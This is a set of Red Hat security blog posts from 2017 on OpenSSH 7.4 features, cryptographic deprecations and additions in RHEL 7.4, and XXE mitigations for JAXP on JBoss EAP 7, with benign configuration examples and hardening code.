    In conclusion, which Post-Quantum cryptographic scheme will be accepted will ultimately depend on how fast quantum computers become viable and made available at minimum to state agencies if not the general public.

    Posted: 2017-07-26T13:30:00+00:00
  • What is new in OpenSSH 7.4 (in RHEL 7.4)?

    Authored by: Jakub Jelen

    Red Hat Enterprise Linux 7 (RHEL 7) so far has been providing iterations of OpenSSH 6.6.1p1, first released in 2014. While we've kept it updated against vulnerabilities, many things have changed both in security requirements and features provided by the latest OpenSSH. Therefore, OpenSSH has now been updated to the recently released OpenSSH 7.4p1, which brings many new features and security enhancements. For the complete set of changes and bugfixes, please refer to the upstream release notes.

    New features

    This OpenSSH client and server rebase brings on many new and useful features. The most prominent ones are described below.

    Host Key Rotation

    Setting up a new system accessed by SSH, or generating new server host keys which satisfy new security requirements, was a complicated task in the past. New keys had to be distributed to all users and swapped in the server configuration atomically, otherwise users would see scary warnings about possible MITM attack. This update addresses that problem by presenting all the host keys to connecting clients, allowing for a smooth transition between old and new keys.

    This functionality is controlled by the client configuration option UpdateHostKeys. When the value is set to yes or ask, the client will request all the public keys present on the server (with OpenSSH 6.8 and newer) and store them in the known_hosts file. These keys are transferred using the encrypted channel and the client verifies the signatures from the server, therefore this operation does not require explicit user verification, assuming the previously used host key is already trusted.

    $ ssh -o UpdateHostKeys=ask localhost
    Learned new hostkey: RSA SHA256:5oa3j5qave0Tz2ScovK084zqtgsGy0PeZfL8qc7NMtk
    Learned new hostkey: ED25519 SHA256:iZG0mDh0JZaPrQ+weGEEyjfN+qL9EDRxrffhqzoAFdo
    Accept updated hostkeys? (yes/no): yes
    Last login: Wed May  3 16:29:38 2017 from ::1
    

    New SHA256 Fingerprint Format

    As can be seen in the previous paragraph, OpenSSH moved away from MD5-based fingerprints to SHA256 ones. The new hash is longer and therefore it is represented in base64 format instead of the colon-separated hexadecimal pairs. The fingerprint format can be specified using the FingerprintHash configuration option in ssh_config, or with -E switch to ssh-keygen. In most places both hashes are shown by default (SHA256 and MD5) for backward compatibility:

    $ ssh example.org
    The authenticity of host 'example.org (192.168.0.7)' can't be established.
    ECDSA key fingerprint is SHA256:kmtPlIwHZ4B68g6/eRbDTgC2GD0QnmrjjA0MjOB3/HY.
    ECDSA key fingerprint is MD5:57:01:87:16:7a:a8:24:60:db:9e:05:3f:a0:78:aa:69.
    Are you sure you want to continue connecting (yes/no)? yes
    

    Other tools require an explicit command line option to provide the old fingerprint format:

    $ ssh-keygen -l -f /etc/ssh/ssh_host_rsa_key.pub
    256 SHA256:kmtPlIwHZ4B68g6/eRbDTgC2GD0QnmrjjA0MjOB3/HY no comment (ECDSA)
    $ ssh-keygen -l -E md5 -f /etc/ssh/ssh_host_rsa_key.pub
    256 MD5:57:01:87:16:7a:a8:24:60:db:9e:05:3f:a0:78:aa:69 no comment (ECDSA)
    

    Simplified connection using intermediate hosts

    There is a new configuration option ProxyJump, and command line switch -J, which significantly simplifies the configuration and connection to servers in private networks behind a jump box.

    In the past, there was only the ProxyCommand option, which covered many use cases though it was complex to use. It required a configuration as follows:

    Host proxy2
      ProxyCommand ssh -W %h:%p -p 2222 user@proxy
    Host example.com
      ProxyCommand ssh -W %h:%p user2@proxy2
    

    The new ProxyJump configuration syntax is simpler, and makes it very easy to write even longer chains of connections. For example:

    Host example.com
      ProxyJump user@proxy:2222,user2@proxy2
    

    The same as above can also be simply specified ad-hoc on the command-line:

    $ ssh -J user@proxy:2222,user2@proxy2 example.com
    

    UNIX domain socket forwarding

    Previously, OpenSSH allowed only TCP ports to be forwarded in SSH channels. Many applications today are using UNIX domain sockets instead, so OpenSSH implemented support for them. You can forward a remote socket to a local one, the other way round, or even UNIX domain socket to TCP socket, and it is not more complicated than standard TCP forwarding. Just replace hostname:port values with paths to UNIX domain sockets.

    For example, the remote MariaDB socket can be forwarded to the local machine and allow secure connection to this database:

    $ ssh -L /tmp/mysql.sock:/var/lib/mysql/mysql.sock -fNT mysql.example.com
    $ mysql -S /tmp/mysql.sock
    

    New default cipher ChaCha20-Poly1305

    Although the ChaCha20-Poly1305 cipher was available in the older OpenSSH versions, it is now prioritized over other ciphers since it is considered mature enough with reasonable performance. It is a cipher of the Authenticated Encryption with Associated Data (AEAD) form which combines the MAC algorithm (Poly1305) with the cipher, similar to AES-GCM. The cipher is automatically used when connecting to RHEL7 servers1, but the connection to other servers will still use other supported ciphers.

    Improvement in ssh-agent connection

    So far, identity management in ssh-agent (e.g. adding of the SSH keys in ssh-agent) is handled by the ssh-add tool. This must be used prior to connecting to a remote server using ssh.

    It can come in handy to add and decipher the required keys on demand while connecting to a remote server. For that, the option AddKeysToAgent in ssh_config will either add all the used keys automatically or prompt to add new keys that are being used. In combination with the -t switch in ssh-agent, specifying a key's lifetime, it is a simple and secure alternative to storing your keys in ssh-agent indefinitely.

    Furthermore, the ssh-agent connection socket can now be specified in ssh_config using IdentityAgent, which removes quite a lot of the struggle starting the ssh-agent properly and passing the environment variables to existing processes. For example, the following snippet in ~/.bashrc will start the agent, and added keys will have a default lifetime of 10 hours:

    SOCK=/tmp/username/ssh-agent.sock
    SOCK_DIR=`dirname $SOCK`
    [ -d "$SOCK_DIR" ] || mkdir -m700 $SOCK_DIR
    [ -f "$SOCK" ] || eval `ssh-agent -a "$SOCK" -t 10h`
    

    The corresponding configuration in ~/.ssh/config will contain the following lines:

    IdentityAgent /tmp/username/ssh-agent.sock
    AddKeysToAgent yes
    

    Security-related changes

    Over the years, there were many changes upstream regarding security. With this update we are trying to preserve backward compatibility, while removing (potentially) broken algorithms or options that were still available in the current OpenSSH available in Red Hat Enterprise Linux 7.

    Not using SHA-1 for signatures by default

    The original SSH protocol in RFC 4253 only defines RSA authentication signatures using the SHA-1 hash algorithm. As SHA-1 is no longer considered safe, the protocol has been extended in draft-ietf-curdle-rsa-sha2 to allow SHA-2 algorithms along with RSA signatures. This extension is negotiated automatically when connecting to servers running OpenSSH 7.2 and newer. It can be verified that the new hash algorithm is used from the debug log as follows:

    debug2: KEX algorithms: [...],ext-info-c
    [...]
    debug3: receive packet: type 7
    debug1: SSH2_MSG_EXT_INFO received
    debug1: kex_input_ext_info: server-sig-algs=<rsa-sha2-256,rsa-sha2-512>
    [...]
    debug1: Server accepts key: pkalg rsa-sha2-512 blen 279
    

    SSH-1 server removed

    The obsolete SSH-1 server code was removed from OpenSSH. The complete announcement can be found in this knowledgebase article.

    As with previous RHEL 7 releases, connections from clients to existing SSH-1 servers are still possible, and require the use of -1 switch or the use the following configuration:

    Host legacy.example.com
      Protocol 2,1
    

    Seccomp filter for privilege separation sandbox

    The OpenSSH server in RHEL is now built with seccomp filter sandbox, which is enabled by default. In previous versions, the rlimit method was used to limit resources available for a network-facing process. The seccomp filter allows only a very limited list of system calls from this process, reducing the impact of a compromise. That sandbox can be turned off in /etc/ssh/sshd_config by setting:

    UsePrivilegeSeparation yes
    

    Removed support for pre-authentication compression

    Historically, compression in network protocols was recommended in order to increase encryption performance and reduce the amount of data available to an adversary.

    Given statistical attacks and the fact that compression in combination with encryption increases code complexity and attack surface, enabling compression with encryption today is mostly seen as a security liability, underlined by issues such as CVE-2016-10012.

    The compression option was disabled in OpenSSH server for more than 10 years, and on this release, it is completely removed.

    Deprecation of insecure algorithms

    Following up with Deprecation of Insecure Algorithms in RHEL 6.9, legacy algorithms that potentially pose a more serious threats to deployments are being disabled. That, in RHEL 7.4, affects the RC4 ciphers, as well as MD5, RIPE-MD160, and truncated SHA-1 MACs on both client and server side. The ciphers Blowfish, Cast128, and 3DES were removed from the default set of algorithms accepted by the client but are still supported in the server.

    If these algorithms are still needed for interoperability with legacy servers or clients, they can be enabled on a per-host basis as described in the upstream documentation. The following example describes how to enable 3des-cbc cipher in a client:

    Host legacy.example.org
      Ciphers +3des-cbc
    

    Another example, enabling hmac-md5 in a server for legacy.example.org client:

    Match Host legacy.example.org
      MACs +hmac-md5
    

    Conclusion

    The new OpenSSH in RHEL 7.4 comes with many bug fixes and features that might affect your everyday work and that are worth using. Engineering has worked very hard to maintain the backward compatibility with previous versions while improving the security defaults at the same time. If you feel any regressions have been missed please contact Red Hat Support.


    1. Not when the system is in FIPS140-2 certified mode. 

    Posted: 2017-07-12T00:00:00+00:00
  • Enhancing the security of the OS with cryptography changes in Red Hat Enterprise Linux 7.4

    Authored by: Nikos Mavrogian...

    Today we see more and more attacks on operating systems taking advantage of various technologies, including obsolete cryptographic algorithms and protocols. As such, it is important for an operating system not only to carefully evaluate the new technologies that get introduced, but to also provide a process for phasing out technologies that are no longer relevant. Technologies with no practical use today increase the attack surface of the operating system and more specifically, in the cryptography field, introduce risks such as untrustworthy communication channels, when algorithms and protocols are being used after their useful lifetime.

    That risk is not being confined to the users of the obsolete technologies; as the DROWN and other cross-protocol attacks have demonstrated, it is sufficient for a server to only enable a legacy protocol in parallel with the latest one, for all of its users to be vulnerable. Furthermore, the recent cryptographic advances against the SHA-1 algorithm used for digital signatures, demonstrate the need for algorithm agility in modern infrastructures. SHA-1 was an integral part of the Internet and private Public Key Infrastructures and despite that, we must envision a not so distant future with systems that no longer rely on SHA-1 for any cryptographic purpose.

    To address the challenges above, with the release of Red Hat Enterprise Linux (RHEL) 7.4 beta, we are introducing several cryptographic updates to RHEL and we also are introducing a multitude of new features and enhancements. We continue and extend our protocol deprecation effort started in RHEL 6.9, improve access to kernel-provided PRNG with the getrandom system call, as well as ensure that HTTP/2 supporting technologies like ALPN in TLS, and DTLS 1.2, are supported universally in our operating system. Python applications are also made secure by default by enabling certificate verification by default in TLS sessions. We are also proud to bring the OpenSC smart card drivers into RHEL 7.4, incorporating our in-house developed drivers and merging our work with the OpenSC project community efforts. At the same time, the introduced crypto changes ensure that RHEL 7.4 meets the rigorous security certification requirements for FIPS140-2 cryptographic modules.

    Removal of SSH 1.0, SSL 2.0 protocols and EXPORT cipher suites

    For reasons underlined in our deprecation of insecure algorithms blog post, that is, to protect applications running in RHEL from severe attacks utilizing obsolete cryptographic protocols and algorithms, the SSH 1.0, SSL 2.0 protocols, as well as those marked as ‘export’ cipher suites will no longer be included in our supported cryptographic components. The SSH 1.0 protocol is removed from the server-side of the OpenSSH component, while support for it will remain on the client side (already disabled by default) to allow communications with legacy equipment. The SSL 2.0 protocol as well as the TLS ‘export’ cipher suites are removed unconditionally from the GnuTLS, NSS, and OpenSSL crypto components. Furthermore, the Diffie-Hellman key exchange is restricted only to values considered acceptable for today’s cryptographic protocols.

    Note also, that through our review of accepted legacy hashes in the operating system we have discovered that the OpenSSL component enables obsolete hashes for digital signatures, such as SHA-0, MD5, and MD4. Since these hashes have no practical use today, and to reduce the risk of relying on legacy algorithms, we have decided to deviate from upstream OpenSSL settings and disable these hashes by default for all OpenSSL applications. That change is reversible (see release notes). Note that this issue was discussed with the upstream OpenSSL developers, and although that behavior is known to them, it is kept for backwards compatibility.

    Below is a summary of the deprecated protocols and algorithms.

    Introduced change Description Reversible
    SSL 2.0 protocol The shipped TLS libraries will no longer include support for the SSL 2.0 protocol. No.
    Export TLS ciphersuites The shipped TLS libraries will no longer include support for Export TLS ciphersuites. No.
    SSH 1.0 protocol The shipped OpenSSH server will no longer include support for SSH 1.0 protocol. No.
    TLS Diffie-Hellman key exchange Only parameters larger than 1024-bits will be accepted by default. Conditionally (information will be provided in the release notes).
    Insecure hashes for digital signatures in OpenSSL The MD5, MD4 and SHA-0 algorithms will not be enabled by default for TLS sessions or certificate verification on OpenSSL. Yes. Administrators can revert this setting system-wide (information will be provided in the release notes).
    RC4 algorithm The algorithm will no longer be enabled by default for OpenSSH sessions. Yes. Administrators can revert this setting system-wide (information will be provided in the release notes).

    Phasing out of SHA-1

    SHA-1 was published in 1993 and is still in use today in a variety of applications including but not limited to the web PKI. In particular, its primary use case is digital signatures on data, certificates, and OCSP responses. However, there are several known weaknesses on this hash and there was recently a demonstration of collision attack, something that, when combined with the experience of MD5 hash attacks, is an indication that a forged certificate attack may not be far in the future. For that reason, we have ensured that all our cryptographic tools1 which deal with digital signatures will no longer use SHA-1 as the default hash function, but instead switch to SHA2-256, which provides maximum compatibility with older clients.

    In addition, to further strengthen the resistance of RHEL to such cryptographic attacks, we have lifted the OpenSSH server and client limitation to SHA-1 for digital signatures, enabling support for SHA2-256 digital signatures.

    We do not yet plan to disable SHA-1 system-wide in RHEL 7 as a significant amount of infrastructure still depends on it, and disabling it would severely disrupt operations. Nonetheless, we would like to recommend software engineers working on RHEL to no longer rely on SHA-1 for cryptographic purposes, and system administrators to verify that they no longer use certificates, OCSP stapled responses, or any other cryptographic structure with SHA-1 based signatures.

    To verify whether a certificate, OCSP response, or CRL utilize the SHA-1 hash algorithm for signature, you may use the following commands.

    Test Command
    Certificate in FILENAME uses SHA-1 openssl x509 -in FILENAME -text -noout | grep -i 'Signature.*sha1'
    OCSP response in FILENAME uses SHA-1 openssl ocsp -resp_text -respin FILENAME -noverify | grep -i 'Signature.*sha1'
    CRL in FILENAME uses SHA-1 openssl crl -in FILENAME -text -noout | grep -i 'Signature.*sha1'

    HTTP/2 related updates

    Modern internet applications strive for low-latency and good responsiveness, and the HTTP/2 protocol is a major driver to that effort. With the introduction of OpenSSL 1.0.2 into RHEL 7.4, we complete across our base crypto stack support for Application Layer Protocol Negotiation (ALPN). This TLS protocol extension enables applications to reduce TLS handshake round-trips by negotiating the application protocol and its version during the handshake process. In practice this is used for applications to signal their HTTP/2 support, eliminating the need for additional round-trips after the TLS connection is established. That, when combined with other kernel features such as TCP fast open, can further fine-tune the TLS session establishment.

    DTLS 1.2 for all applications

    Additionally, the introduction of OpenSSL 1.0.2 brings support for the Datagram TLS 1.2 (DTLS) protocol in OpenSSL applications, completing that support throughout the TLS stacks on the operating system. That support ensures that applications using the DTLS protocol can take advantage of the secure authenticated encryption (AEAD) cipher suites, eliminating the reliance on CBC cipher suites, which are known to be problematic for DTLS.

    Crypto-related Python-language changes

    The upstream version of Python 2.7.9 enabled SSL/TLS certificate verification in Python’s standard library modules that provide HTTP client functionality such as urllib, httplib or xmlrpclib. Prior to this change, no certificate verification was performed by default, making Python applications vulnerable to certain classes of attacks in SSL and TLS connections. It was a well known issue for a long time and several applications worked around the issue by implementing their own certificate checks. Despite these work-arounds, in order to ensure that all Python applications are secure by default, and follow a consistent certificate validation process, in Red Hat Enterprise Linux 7.4 we incorporate the upstream change and enable certificate verification by default in TLS sessions for all applications.

    Crypto-related kernel changes

    Despite the fact that the Linux kernel was one of the first to provide interfaces to access cryptographically-secure pseudo-random data via /dev/*random interfaces, these interfaces show their age today. The /dev/random is a system device which when read will provide random data, to the extent assessed by an internal estimator. That is, the device will block when not enough random events, related to internal kernel entropy sources, such as interrupts, CPU, and others, are accumulated. Due to that, the /dev/random interface may seem initially tempting to use. However, in practice /dev/random cannot be relied on; it requires a large amount of random events to be accumulated to provide few bytes of random data, and any use of it during boot time could risk blocking the system indefinitely.

    On the other hand, the device /dev/urandom provides access to the same random generator, but will never block, nor apply any restrictions to the number of new random events that must be read in order to provide any output. That is expected, given that modern random generators when sufficiently seeded can provide an enormous amount of output prior to being considered broken in an informational-theoretic sense. Unfortunately, /dev/urandom suffers from a design flaw. When used early in the boot process prior to initialization of the kernel random number generator, it will still output data. How random is the output data is system-specific, but in modern platforms, which provide a CPU-based random generator, that is less of an issue.

    To eliminate such risks, RHEL 7.4 introduces the getrandom() system call, which combines the best of the existing interfaces. It can provide non-blocking access to kernel CPRNG and it will block prior to the kernel random generator being initialized. Furthermore, it requires no file descriptor to be carried by application and libraries. The new system call is available through the syscall(2) interface.

    Smart card related changes

    For long time, RHEL provided the CoolKey smart-card driver for applications to access the PKCS#11 API on smart cards. This driver was limited to the smart cards that we focus on for our operating system, that is, the PIV, CAC, PKCS#15-compliant and CoolKey-applet cards. However, over the years, the community-based OpenSC project, which provided an alternative driver, has managed to provide support for the majority of available smart cards, provide solid code base with support for the industry standard PKCS#11 API, and is already included in our Fedora distribution for many years. Most importantly, however, the project also serves as a healthy example of a community-driven project, with collaborating engineers from diverse backgrounds and technologies.

    With that in mind, we have proceeded by merging our projects, by introducing missing drivers and features to OpenSC, as well as by releasing our extensive test suite for smart card support. The outcome of this effort is made available on RHEL 7.4, where the OpenSC component will serve in parallel with the CoolKey component. The latter will remain supported for the lifetime of RHEL 7, however, new hardware enablement will only be available on the OpenSC component.

    Future changes

    In the lifetime of Red Hat Enterprise Linux 7 we plan to deprecate and disable by default the SSL 3.0 protocol and the RC4 cipher from TLS and Kerberos system-wide. Note that we do not plan to remove support for the above algorithms, but disable them for applications, which did not explicitly requested them.

    Introduced change Description Reversible
    SSL 3.0 protocol The shipped TLS libraries will no longer enable support for the SSL 3.0 protocol. This is a protocol which has been superseded by TLS 1.0 for almost two decades, and there is a multitude of attacks towards it. By explicitly enabling the protocol in applications that require it.
    RC4 The shipped TLS libraries will no longer enable support for the RC4 based ciphersuites by default. Cryptographic advances have shown that accidental usage of that algorithm put applications at risk in relation with data secrecy. By explicitly enabling the ciphersuites in applications that require them.

    Concluding remarks

    All of the above changes ensure that Red Hat Enterprise 7 remains a leader in the adoption of new technologies with security built into the OS. Red Hat Enterprise Linux not only carefully evaluates and incorporates new technologies, but technologies that are no longer relevant and pose a security risk are regularly phased out. Specifically, HTTP/2-supporting protocols are made available in all of our cryptographic back-ends. We also align with the community on smart card development not only by bringing our improvements to the OpenSC project, but by introducing it as a fully supported component in Red Hat Enterprise Linux 7. Furthermore, with the introduction of Datagram TLS 1.2 in OpenSSL, and the updates in OpenSSH in order to support other than SHA-1 cryptographic hashes, we ensure that all Red Hat Enterprise Linux 7 applications utilize the right cryptographic algorithms which can resist today’s threats.

    On the other hand, we reduce the attack surface of the operating system, by removing support for SSH 1.0, SSL 2.0, and the TLS ‘export’ cipher suites. That is a move which reduces the risk of successful future attacks, at the cost of removal of protocols which are today considered either too risky to use or plain insecure.

    The removal of the previously mentioned protocols was an exceptional move because we are convinced that these are primarily used to attack misconfigured systems rather than for real-world use cases. Regarding any future changes, for example the disablement of SSL 3.0 or RC4, we would like to assure that it will be done in a way that systems can revert to the previous behavior when required by local policy.

    All of these changes ensure Red Hat Enterprise Linux keeps pace with the reality of the security landscape around us, and improves its strong security foundation.


    1. The above applies to software from the GnuTLS, NSS, and OpenSSL crypto components. 

    Posted: 2017-06-16T00:00:00+00:00
  • Secure XML Processing with JAXP on EAP 7

    Authored by: Jason Shepherd

    The Java Development Kit (JDK) version 8 provides the Java API for XML Processing (JAXP). If a developer is using JAXP on Red Hat JBoss Enterprise Application Platform (EAP) 7 they need to be aware that Red Hat JBoss EAP 7 ships it's own implementation, with some differences from JDK 8 that are covered in this article.

    Background

    There have been three issues raised in the month of May 2017 relating to JAXP on Red Hat JBoss EAP 7: CVE-2017-7464, CVE-2017-7465, and CVE-2017-7503. All of the issues are XML External Entity (XXE) vulnerabilities, which have affected Java since 2002. XXE is a type of attack that affects weakly configured XML parsers. A successful attack occurs when XML input contains external entities. Those external entities can do things such as access local network resources, or read local files.

    Red Hat maintains it's own fork of Xalan used for XML processing. This was done to avoid certain limitations with the upstream code in a multi-classloader, modular environment, such as Red Hat JBoss EAP. The JDK maintains it's own fork as well, and has made some security improvements which have not been contributed back to the upstream Xalan project. For example a Billion Laughs-style XXE attack is thwarted on OpenJDK 1.8.0_73 by changes that result in an error message such as:

    JAXP00010001: The parser has encountered more than "64000" entity expansions in this document; this is the limit imposed by the JDK.
    

    It's important to remember that you only need to be concerned about vulnerabilities affecting XML processing if you don't trust the XML content you are parsing. One way to add trust to XML content is by adding authentication to network-accessible endpoints which are accepting XML content.

    The current situation

    All of the vulnerabilities relate to JAXP and not to the Web Services specifications JAX-WS and JAX-RS. JAX-WS and JAX-RS are implemented on Red Hat JBoss EAP by Apache CXF and Resteasy. One of the main goals for developers on Red Hat JBoss EAP is to build web services, which is why the distinction is made. If you're doing web service development on Red Hat JBoss EAP 7, these issues will mostly not apply. They affect the use of JAXP directly for XML processing.

    There is one place where web services overlap with JAXP, and user code could potentially be affected by one of these vulnerabilities. Section 4.2.4 of the JAX-RS 2.0 specification mandates that EAP 7 must provide MessageBodyReader, and MessageBodyWriter implementations for javax.xml.transform.Source. This is used for processing of JAX-RS requests with application/*+xml media types. A common way of unmarshaling a javax.xml.transform.Source is to use a TransformerFactory as demonstrated here:

    TransformerFactory factory = TransformerFactory.newInstance();
    Transformer transformer = factory.newTransformer();
    StreamResult xmlOutput=new StreamResult(new StringWriter());
    transformer.transform(mySource,xmlOutput);
    resultXmlStr = xmlOutput.getWriter().toString();
    

    Where mySource is of type javax.xml.transform.Source.

    In this situation, there is one outstanding issue, CVE-2017-7503, on EAP 7.0.5 which is yet to be resolved. While this is one place where Red Hat JBoss EAP encourages the use of JAXP, the JAX-RS implementation (Resteasy) is not directly affected. Resteasy is not directly affected because it doesn't do any processing of a javax.xml.transform.Source as demonstrated above. It only provides a javax.xml.transform.Source for the developer to transform in their web application code.

    CVE-2017-7503 affects processing of XML content from an untrusted source using a javax.xml.transform.TransformerFactory. The only safe way to process untrusted XML content with a TransformerFactory is to use the StAX API. StAX is a safe implementation on EAP 7.0.x because the XML content is not read in it's entirety in order to parse it. As a developer using StAX, you decide which XML stream events you want to react to, so XXE control constructs won't be processed automatically by the parser.

    For CVE-2017-7464 and CVE-2017-7465 there are mitigations from OWASP XXE Prevention Cheat Sheet. The specific mitigation for these issues are as follows:

    CVE-2017-7464

    SAXParserFactory parserFactory = SAXParserFactory.newInstance();
    parserFactory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
    parserFactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl",
                 true);
    

    CVE-2017-7465

    TransformerFactory factory = TransformerFactory.newInstance();
    factory.setFeature(javax.xml.XMLConstants.FEATURE_SECURE_PROCESSING, true);
    

    How could it be fixed?

    On Red Hat JBoss EAP 7.0.x, CVE-2017-7503 is yet to be resolved. In contrast CVE-2017-7464 and CVE-2017-7465 already have mitigations in place so a fix may not be provided in the 7.0.x stream.

    Ideally, JAXP implementations would be removed entirely from Red Hat JBoss EAP 7 and rely solely on those from the JDK itself. Removing Xalan from Red Hat JBoss EAP is still being investigated.

    A compromise might be to maintain a fork of the JAXP libraries and enable the secure options recommended by OWASP by default in a future major release of Red Hat JBoss EAP 7.

    Posted: 2017-06-01T13:30:00+00:00
Close

Welcome! Check out the Getting Started with Red Hat page for quick tours and guides for common tasks.